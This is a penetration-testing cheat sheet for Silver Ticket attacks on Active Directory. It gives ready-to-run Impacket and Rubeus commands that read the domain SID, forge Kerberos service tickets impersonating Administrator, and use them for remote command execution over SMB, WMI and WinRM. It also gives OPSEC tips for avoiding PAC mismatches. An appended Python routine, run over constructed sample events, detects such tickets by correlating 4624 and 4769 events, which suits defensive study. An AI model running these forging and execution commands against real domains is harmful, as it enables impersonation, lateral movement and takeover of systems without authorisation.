Silver Ticket

Forge a service ticket (TGS) offline using a service’s key (machine account or service account) to authenticate only to that service—no KDC contact.

When to use

  • You have the service key (e.g., DC$ NT hash for DC services, or a member server’s machine hash for cifs/host).
  • You know the Domain SID, the target SPN, and a user to impersonate who has rights on the target.

Quick helpers

  • Get Domain SID: rpcclient -U '<domain>/<user>%<pass>' <dc> -c 'lsaquery'
  • Common SPNs: cifs/<host> (SMB), HOST/<host> (WMI/DCOM), HTTP/<host> (WinRM/IIS), ldap/<dc> (LDAP on DC)


Linux (Impacket)

1) Generate ticket

ticketer.py -nthash <NTHASH> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -spn <SPN>/<host.fqdn> <UserToImpersonate>

Examples:

ticketer.py -nthash <DC_MACHINE_NT> -domain corp.local -domain-sid S-1-5-21-... -spn cifs/dc01.corp.local Administrator

ticketer.py -nthash <SERVER_MACHINE_NT> -domain corp.local -domain-sid S-1-5-21-... -spn HOST/ws01.corp.local Administrator

2) Load ticket & verify

export KRB5CCNAME=<UserToImpersonate>.ccache && klist

3) Use the ticket (match SPN/tool)

KRB5CCNAME=<User>.ccache smbexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>

KRB5CCNAME=<User>.ccache wmiexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>

KRB5CCNAME=<User>.ccache evil-winrm -r <host.fqdn> -S -k


Windows (Rubeus)

1) Forge & inject

Rubeus.exe silver /service:cifs/<host.fqdn> /rc4:<NTHASH> /user:<UserToImpersonate> /domain:<DOMAIN.FQDN> /sid:<S-1-5-21-...> /ptt

(Use /service:HOST/<host> for WMI/DCOM, /service:HTTP/<host> for WinRM/IIS.)

2) Verify

klist

3) Use

dir \\<host>\C$


Notes / OPSEC

  • Scope: Silver tickets work only for the specified SPN; they don’t grant a TGT.
  • Targets: DC services often run as LocalSystem, so the DC$ hash can forge cifs/, ldap/, HOST/ tickets to the DC. Member servers: use that server’s machine hash for cifs/host.
  • User choice: Impersonate an existing user with local admin on the target (e.g., Administrator) to avoid PAC mismatches.
  • Detection: Often no 4769 on the DC (the KDC is never contacted), but the target logs 4624 Kerberos logons; look for unusual SIDs/groups/PAC, and for 4624 Kerberos logons on a host with no corresponding 4769 on the DC.
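The detection point above (target 4624 Kerberos logons that the DC never issued a 4769 for, or whose SID is not from this domain) as an added example that is not part of the original page: a small correlation routine run over constructed sample events. The domain SID, host names, users and timestamps are all made up for the example; a real deployment would feed it events from the DC and member-server security logs.

```python
"""Added detection example: correlate 4624 Kerberos network logons seen on a
member server with 4769 service-ticket requests seen on the DC. A forged
service ticket never touches the KDC, so the target-side logon has no DC-side
4769, and a sloppily built PAC may carry a SID from the wrong domain."""
from datetime import datetime, timedelta

# Constructed domain SID for the example; a real deployment reads it from the domain.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"

# Constructed 4769 events as seen on the DC (KDC issued a service ticket).
DC_4769 = [
    {"time": "2024-05-01T09:00:00", "user": "alice", "service": "cifs/fs01.corp.local"},
]

# Constructed 4624 events as seen on member server fs01 (Logon Type 3, Kerberos).
TARGET_4624 = [
    # Legitimate: DC issued a ticket two seconds earlier.
    {"time": "2024-05-01T09:00:02", "host": "fs01.corp.local", "user": "alice",
     "sid": DOMAIN_SID + "-1105", "logon_type": 3, "auth_pkg": "Kerberos"},
    # Suspicious: Kerberos logon with no 4769 on the DC for this user/host.
    {"time": "2024-05-01T09:10:00", "host": "fs01.corp.local", "user": "Administrator",
     "sid": DOMAIN_SID + "-500", "logon_type": 3, "auth_pkg": "Kerberos"},
    # Suspicious: SID belongs to a different domain SID and no 4769 either.
    {"time": "2024-05-01T09:12:00", "host": "fs01.corp.local", "user": "svc_backup",
     "sid": "S-1-5-21-9999999999-8888888888-7777777777-1200",
     "logon_type": 3, "auth_pkg": "Kerberos"},
    # Ignored: NTLM logon, out of scope for this check.
    {"time": "2024-05-01T09:15:00", "host": "fs01.corp.local", "user": "bob",
     "sid": DOMAIN_SID + "-1106", "logon_type": 3, "auth_pkg": "NTLM"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def has_matching_tgs(logon, dc_4769, window):
    """True if the DC issued a service ticket to this user for this host
    within `window` before the target-side logon."""
    t = _ts(logon["time"])
    for ev in dc_4769:
        service = ev["service"]
        spn_host = service.split("/", 1)[1].lower() if "/" in service else ""
        if (ev["user"].lower() == logon["user"].lower()
                and spn_host == logon["host"].lower()
                and timedelta(0) <= t - _ts(ev["time"]) <= window):
            return True
    return False


def find_suspicious(target_4624, dc_4769, domain_sid, window=timedelta(minutes=5)):
    """Return Kerberos network logons on the target that have no DC-side 4769
    and/or carry a SID whose domain part is not ours."""
    findings = []
    for logon in target_4624:
        if logon["auth_pkg"] != "Kerberos" or logon["logon_type"] != 3:
            continue
        reasons = []
        # Domain part of the SID is everything before the trailing RID.
        if logon["sid"].rsplit("-", 1)[0] != domain_sid:
            reasons.append("SID not from this domain")
        if not has_matching_tgs(logon, dc_4769, window):
            reasons.append("no 4769 on DC for this user/host")
        if reasons:
            findings.append({"user": logon["user"], "time": logon["time"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(TARGET_4624, DC_4769, DOMAIN_SID):
        print(f["time"], f["user"], "; ".join(f["reasons"]))
```

Two caveats when using this for real: 4769 only appears on the DC if "Audit Kerberos Service Ticket Operations" is enabled, and a legitimate client may reuse a cached service ticket issued well before the 5-minute window, so widen the window to the ticket lifetime (or key on the ticket's issue time) before treating a missing 4769 as an alert on its own.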